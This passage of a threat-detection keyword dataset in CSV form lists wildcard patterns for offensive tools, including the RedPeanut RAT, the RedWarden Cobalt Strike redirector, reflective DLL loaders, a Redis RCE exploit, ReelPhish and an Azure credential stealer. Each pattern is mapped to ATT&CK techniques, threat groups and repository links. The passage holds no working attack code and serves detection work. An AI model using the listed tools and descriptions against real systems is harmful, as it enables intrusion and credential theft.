Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*RedHunt-OS*","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","10","1170","185","2020-07-13T04:54:49Z","2018-03-14T19:31:16Z" +"*redis-rce*","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","9","856","216","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z" +"*redlotus.efi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*RedPeanut Smb server started*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanut.Models*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*redpeanut.pfx*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanut.Resources.*.txt","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanut.Utility*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.C2*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Core*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Evasion*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Execution*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutAgent.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutC2*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutCLI*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutDBContext*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutDBInitializer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutHtaPowerShellScript*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutHtaScript.hta*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutInstallUtil.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutMigrate.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutMSBuildScript.xml*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutPowershellScriptS*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutRP.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutShooter.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutSpawn.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutSpawnTikiTorch.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutVBAMacro.vba*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedSiege/CIMplant*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*redskal/SharpAzbelt*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*redsocks-fw.sh stop*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*Red-Team-Infrastructure-Wiki.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*Red-Teaming-Toolkit*","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","7962","2070","2023-06-01T08:38:39Z","2018-04-26T13:35:09Z" +"*RedTeamOperations*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RedTeamOperations","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*RedWarden.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedWarden.test*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_access.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_redirector.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*ReelPhish*","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","5","493","156","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z" +"*reflct_dll_inject.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*reflective_dll.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*reflective_dll.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_dll.x64.dll*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*reflective_dll.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_dll_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_pe_loader.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 